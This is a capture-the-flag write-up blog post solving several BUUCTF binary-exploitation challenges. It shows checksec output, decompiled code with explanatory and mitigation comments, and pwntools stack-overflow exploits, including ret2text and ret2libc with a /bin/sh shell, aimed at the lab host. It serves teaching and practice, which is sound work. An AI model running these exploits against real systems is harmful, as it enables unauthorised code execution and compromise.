http://www.joe1sn.top/blog/buuctf/buuctf-pwn-part2.html/
1.test_your_nc
nc + ls + cat flag
环境:Ubuntu 18
2.rip
环境:Ubuntu 18
- 1.checksec
[*] '/mnt/c/Disk E/CTF/Question/BUUCTF/pwn/rip/pwn1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
- 2.IDA
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
// Decompiler view of the rip binary's main(): read one line into a stack
// buffer and echo it back.
char s; // [rsp+1h] [rbp-Fh]   -- a single byte on the stack, 0xF below the saved rbp
puts("please input");
// gets() has no length bound: input longer than the 0xF bytes below rbp
// overwrites the saved frame pointer and then the return address (checksec
// above reports no stack canary). The second argument is a decompiler
// artifact; the real gets() takes only the buffer.
// Mitigation: a sized read such as fgets(buf, sizeof buf, stdin).
gets(&s, argv);
puts(&s);
puts("ok,bye!!!");
return 0;
}
string
LOAD:00000000004002A8 0000001C C /lib64/ld-linux-x86-64.so.2
LOAD:00000000004003B9 0000000A C libc.so.6
LOAD:00000000004003C3 00000005 C gets
LOAD:00000000004003C8 00000005 C puts
LOAD:00000000004003CD 00000007 C system
LOAD:00000000004003D4 00000012 C __libc_start_main
LOAD:00000000004003E6 0000000C C GLIBC_2.2.5
LOAD:00000000004003F2 0000000F C __gmon_start__
.rodata:0000000000402004 0000000D C please input
.rodata:0000000000402011 0000000A C ok,bye!!!
.rodata:000000000040201B 00000008 C /bin/sh
.eh_frame:00000000004020DF 00000006 C ;*3$\"
gets函数漏洞,有/bin/sh
- 3.EXP
from pwn import *
# Python 2 pwntools script: str payloads are passed straight to sendline().
# Under Python 3 the '\x00'*0xf + p64(...) concatenation mixes str and bytes
# and would need a bytes literal.
#context.log_level = "debug"
p = remote("node3.buuoj.cn",27035)   # BUUCTF lab instance for this challenge
binsh_addr = 0x401186   # name is misleading: 0x401186 is in .text, not the /bin/sh string (0x40201B in the string table above)
payload = '\x00'*0xf + p64(binsh_addr)   # 0xf matches the [rbp-Fh] offset of s in the IDA listing above
p.sendline(payload)
p.interactive()
3.warmup_csaw_2016
环境:Ubuntu 16
- 1.checksec
[*] '/mnt/c/Disk E/CTF/Question/BUUCTF/pwn/warmup_csaw_2016/warmup_csaw_2016'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x400000)
RWX: Has RWX segments
- 2.IDA
main
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
// Decompiler view of warmup_csaw_2016's main(): print a banner and a code
// address, then read one line from the client.
char s; // [rsp+0h] [rbp-80h]    -- scratch buffer for the formatted address text
char v5; // [rsp+40h] [rbp-40h]  -- input buffer, 0x40 bytes below the saved rbp
write(1, "-Warm Up-\n", 0xAuLL);
write(1, "WOW:", 4uLL);
// Discloses the address of sub_40060D to the client. The binary has No PIE
// (checksec above), so the value is fixed anyway, but printing code
// addresses to a remote peer is an unnecessary information leak.
sprintf(&s, "%p\n", sub_40060D);
write(1, &s, 9uLL);
write(1, ">", 1uLL);
// Unbounded read into v5 (the second argument is a decompiler artifact);
// input longer than 0x40 bytes runs into the saved rbp and return address.
// Mitigation: bound the read (fgets/read with a size) and drop the address print.
return gets(&v5, ">");
}
string
LOAD:0000000000400238 0000001C C /lib64/ld-linux-x86-64.so.2
LOAD:0000000000400361 0000000A C libc.so.6
LOAD:000000000040036B 00000005 C gets
LOAD:0000000000400370 00000008 C sprintf
LOAD:0000000000400378 00000007 C system
LOAD:000000000040037F 00000012 C __libc_start_main
LOAD:0000000000400391 00000006 C write
LOAD:0000000000400397 0000000F C __gmon_start__
LOAD:00000000004003A6 0000000C C GLIBC_2.2.5
.rodata:0000000000400734 0000000D C cat flag.txt
.rodata:0000000000400741 0000000B C -Warm Up-\n
.rodata:000000000040074C 00000005 C WOW:
.eh_frame:00000000004007FF 00000006 C ;*3$\"
gets溢出,system函数和cat flag字符串
- 3.EXP
from pwn import *
# Python 2 pwntools script (str payloads, `print` statement); not valid
# Python 3 as written.
#context.log_level = 'debug'
p = remote("node3.buuoj.cn",28792)   # BUUCTF lab instance for this challenge
cat_flag = 0x40060d   # sub_40060D, the function whose address main() itself prints (see IDA listing above)
payload = '\x00'*(0x40+8) + p64(cat_flag)   # 0x40 matches v5's [rbp-40h] offset in the IDA listing above
p.sendlineafter(">",payload)
print p.recv()
p.interactive()
4.pwn1_sctf_2016
环境:ubuntu 16
- 1.checksec
[*] '/mnt/c/Disk E/CTF/Question/BUUCTF/pwn/pwn1_sctf_2016/pwn1_sctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
- 2.IDA
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
// Decompiler view of pwn1_sctf_2016's main(): all input handling lives in vuln().
vuln();
return 0;
}
vuln
int vuln()
{
// Decompiler view of pwn1_sctf_2016's vuln(): read a line with a bounded
// fgets(), rewrite it through a std::string, then copy the (possibly longer)
// result back onto the stack with an unbounded strcpy().
const char *v0; // eax
char s; // [esp+1Ch] [ebp-3Ch]   -- 0x20 bytes before v3, enough for the fgets() below
char v3; // [esp+3Ch] [ebp-1Ch]
char v4; // [esp+40h] [ebp-18h]
char v5; // [esp+47h] [ebp-11h]
char v6; // [esp+48h] [ebp-10h]
char v7; // [esp+4Fh] [ebp-9h]
printf("Tell me something about yourself: ");
// Bounded read: at most 31 characters plus NUL into s. `edata` is the
// decompiler's label for the stream; the string table lists `stdin`, which is
// presumably what is meant -- confirm against the binary.
fgets(&s, 32, edata);
std::string::operator=(&input, &s);
std::allocator<char>::allocator(&v5);
std::string::string(&v4, "you", &v5);
std::allocator<char>::allocator(&v7);
std::string::string(&v6, "I", &v7);
// The decompiler has garbled the argument passing, but v4/v6 are the
// std::string literals "you" and "I"; this looks like
// input = replace(input, "I", "you"), which grows the string by two bytes for
// every 'I' replaced.
replace((std::string *)&v3);
std::string::operator=(&input, &v3, &v6, &v4);
std::string::~string((std::string *)&v3);
std::string::~string((std::string *)&v6);
std::allocator<char>::~allocator(&v7);
std::string::~string((std::string *)&v4);
std::allocator<char>::~allocator(&v5);
v0 = (const char *)std::string::c_str((std::string *)&input);
// Unbounded copy back into the fixed stack buffer: the std::string can now be
// longer than the 32 bytes fgets() accepted, so the bound on the read does
// not bound the write. Mitigation: print input.c_str() directly, or copy
// with an explicit size (snprintf(&s, sizeof-of-buffer, "%s", v0)).
strcpy(&s, v0);
return printf("So, %s\n", &s);
}
string
LOAD:08048154 00000013 C /lib/ld-linux.so.2
............. ........ . ..........
LOAD:080488F4 00000007 C strcpy
LOAD:080488FB 00000006 C stdin
LOAD:08048901 00000007 C printf
LOAD:08048908 00000006 C fgets
LOAD:0804890E 0000000D C __cxa_atexit
LOAD:0804891B 00000007 C system
LOAD:08048922 00000012 C __libc_start_main
LOAD:08048934 00000008 C GCC_3.0
LOAD:0804893C 0000000A C GLIBC_2.0
LOAD:08048946 0000000C C GLIBC_2.1.3
LOAD:08048952 0000000E C GLIBCXX_3.4.5
LOAD:08048960 0000000B C CXXABI_1.3
LOAD:0804896B 0000000C C GLIBCXX_3.4
.rodata:080497F0 0000000D C cat flag.txt
.rodata:08049800 00000023 C Tell me something about yourself:
.rodata:08049829 00000008 C So, %s\n
.rodata:08049834 0000002A C basic_string::_S_construct null not valid
.eh_frame:0804996F 00000005 C ;*2$\"
.eh_frame:0804999D 00000005 C zPLR
看上去不会溢出,但是把'I'替换成'you',使字符串变多,栈溢出
- 3.EXP
from pwn import *
# Python 2 pwntools script (str payloads); not valid Python 3 as written.
#context.log_level = 'debug'
p = remote("node3.buuoj.cn",25541)   # BUUCTF lab instance for this challenge
cat_flag = 0x08048F0D   # address chosen from the binary; the function itself is not shown on this page
# 20 * 'I' becomes 20 * "you" after the replace() in vuln() (see listing above).
# checksec reports Arch: i386, so p32 would match the 4-byte return slot;
# p64 appends four extra NUL bytes here.
payload = 'I'*20 + 'a'*4 + p64(cat_flag)
p.sendline(payload)
p.interactive()
5.ciscn_2019_n_1
- 1.checksec
[*] '/mnt/c/Disk E/CTF/Question/BUUCTF/pwn/ciscn_2019_c_1/ciscn_2019_c_1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
- 2.IDA
main
// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
// Decompiler view of ciscn_2019_c_1's main(): print a banner, then loop on a
// numeric menu choice until 3 (exit) or an unrecognised value.
int v4; // [rsp+Ch] [rbp-4h]   -- menu choice
init(*(_QWORD *)&argc, argv, envp);
puts("EEEEEEE hh iii ");
puts("EE mm mm mmmm aa aa cccc hh nn nnn eee ");
puts("EEEEE mmm mm mm aa aaa cc hhhhhh iii nnn nn ee e ");
puts("EE mmm mm mm aa aaa cc hh hh iii nn nn eeeee ");
puts("EEEEEEE mmm mm mm aaa aa ccccc hh hh iii nn nn eeeee ");
puts("====================================================================");
puts("Welcome to this Encryption machine\n");
// begin() is not shown on this page; presumably it prints the menu prompt
// (the script below waits for "Input your choice!", which nothing visible
// here emits) -- confirm against the binary.
begin("Welcome to this Encryption machine\n");
while ( 1 )
{
while ( 1 )
{
fflush(0LL);
// v4 is reset before every scanf(), so a failed "%d" parse leaves 0, which
// falls through every branch below to "Something Wrong!" and exits.
v4 = 0;
__isoc99_scanf("%d", &v4);
getchar();
if ( v4 != 2 )
break;
puts("I think you can do it by yourself");
begin("I think you can do it by yourself");
}
if ( v4 == 3 )
{
puts("Bye!");
return 0;
}
if ( v4 != 1 )
break;
// Option 1 is the only path that reads free-form client text; see encrypt().
encrypt();
begin("%d");
}
puts("Something Wrong!");
return 0;
}
encrypt
int encrypt()
{
// Decompiler view of encrypt(): read a line into a fixed stack buffer,
// XOR-scramble letters and digits in place, and print the result.
size_t v0; // rbx
char s[48]; // [rsp+0h] [rbp-50h]   -- 48 bytes; v3 and then the saved rbp follow it
__int16 v3; // [rsp+30h] [rbp-20h]
memset(s, 0, sizeof(s));
v3 = 0;
puts("Input your Plaintext to be encrypted");
// Unbounded read into a 48-byte buffer: anything longer runs past s and v3
// into the saved rbp and return address (checksec above: no canary).
// Mitigation: fgets(s, sizeof s, stdin) and strip the trailing newline.
gets(s);
// NOTE: x is not declared in this function, so it is a global index. It is
// never reset here, so a second call resumes from wherever the previous call
// left x -- only bytes at and after that offset are transformed.
while ( 1 )
{
v0 = (unsigned int)x;
// strlen() is re-evaluated on every iteration and stops at the first NUL byte.
if ( v0 >= strlen(s) )
break;
if ( s[x] <= 96 || s[x] > 122 )
{
if ( s[x] <= 64 || s[x] > 90 )
{
if ( s[x] > 47 && s[x] <= 57 )
s[x] ^= 0xFu;   // '0'..'9'
}
else
{
s[x] ^= 0xEu;   // 'A'..'Z'
}
}
else
{
s[x] ^= 0xDu;   // 'a'..'z'
}
++x;
}
puts("Ciphertext");
return puts(s);
}
没有binsh字符串,没有system函数,应该是一个puts函数泄露libc的题
BUUCTF的resource一栏有libc.so文件
- 3.EXP
from pwn import *
# Python 2 pwntools script (str payloads mixed with p64() output); not valid
# Python 3 as written.
#context.log_level = 'debug'
p = remote("node3.buuoj.cn",25460)   # BUUCTF lab instance for this challenge
elf = ELF("./ciscn_2019_c_1")   # challenge binary, expected in the working directory
libc = ELF("./libc-2.27.so")    # libc from the BUUCTF resource page (see note above)
puts_plt = elf.plt["puts"]
puts_got = elf.got["puts"]
main_addr = elf.sym["main"]
libc_puts = libc.sym["puts"]
system = libc.sym["system"]
binsh = next(libc.search('/bin/sh'))
pop_rdi = 0x0400c83    # gadget addresses taken from the binary; not shown on this page
leave_ret = 0x04006b9
# Stage 1: 0x50 matches s's [rbp-50h] offset in the encrypt() listing above.
payload = 'A'*(0x50+8) + p64(pop_rdi)+ p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.recvuntil("Input your choice!\n")   # prompt text is not in the IDA listing; presumably printed by begin()
p.sendline("1")
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(payload)
p.recvuntil('@\n')
puts_real = u64(p.recv(6).ljust(8,"\x00"))   # 6-byte leak zero-extended to 8
libc_base = puts_real - libc_puts
system_real = system + libc_base
binsh_real = binsh + libc_base
# Stage 2: the extra leave_ret entry is the stack-alignment "ret" the note
# below describes for Ubuntu 18.
payload = '\x00'*(0x50+8) + p64(leave_ret) + p64(pop_rdi) + p64(binsh_real) + p64(system_real)
p.recvuntil("Input your choice!\n")
p.sendline("1")
p.recvuntil("Input your Plaintext to be encrypted\n")
p.sendline(payload)
p.interactive()
还有一个坑就是Ubuntu18下面调用system要对齐栈,就需要用一个ret
参照EXP:https://www.jianshu.com/p/f6839b1e7283